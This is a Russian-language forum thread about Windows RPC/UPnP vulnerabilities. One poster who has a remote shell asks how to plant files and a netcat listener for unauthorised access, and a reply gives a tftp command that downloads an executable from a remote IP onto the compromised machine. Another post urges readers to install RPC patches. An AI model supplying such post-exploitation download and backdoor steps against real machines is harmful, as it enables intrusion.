Новые RPC и UPnP уязвимсоти в win2K, XP, NT
 

Совсем недавно была опубликована новая дырка. Выложенные эксплоиты позволяют получить шелл на удаленной машине.

Есть вопрос: каким образом скопировать на машину файл.

Кроме идеи создать батничек(копирующий нужное файло), на который в реестре (RunOnce) дать ссылку ничего в голову не приходит! Может посоветуете еще что-нить?

Можно, конечно, и служб разных позапускать! Но хотелось бы просто запустить netcat на какой-нить порт на прослушивание, чтобы удаленно без авторизации пробиваться на комп.

Вобщем бага это уже страя а не новая ака 3 месеца назад был первый сплойт уже !так же были еще баги и раньше в rpc каторые делали ddos aka 2000 год !
а скачивать файлы ну есть для этого ftp
и tftp !
=========================================
tftp.exe[находиться по
адресу winnt\system32\tftp.exe.] Это утилита нам Даст Закачать туда файлы!
TFTP [-I] сервер [GET! PUT] фаил [путь]
-I укаЗывает что БУДем качать файл а не тесктовик
get - команда, указывающая, что вы хотите загружать с заданного сервера файл на удаленный компьютер
Пример:

tftp.exe -i 195.239.4.1 get file.exe c:\file.exe
========================================

Пару дней назад какая то (ну вообше то материтса нелзя я уже мридуприждён, но думаю меня поддержат многие) дак вот какая то с......а нашла дыру в винде котора забивает один svhost+k... Короче Remote Procedure Call (RPC) А именно в течении несколько минут работы в нете вылитает какя то хрень и через минуту комп перегружаетса!
Я так думаю уже не только я получил ету гадость и всю ноч мучилса устанавливая систему!
Дак вот заплатка и срочно всем её поставить даже если вас ето пока обошло стороной!!!
RPC Buffer overflow fixes
Ссыла на хороший серв...
http://www.zamnet.zm/ser-isp/downloads.html
Сразу видите свою систему качаете и ставите заплатки не большие где то по метру!

Извените что второй раз, я тему создал после того как увидел что она уже есть.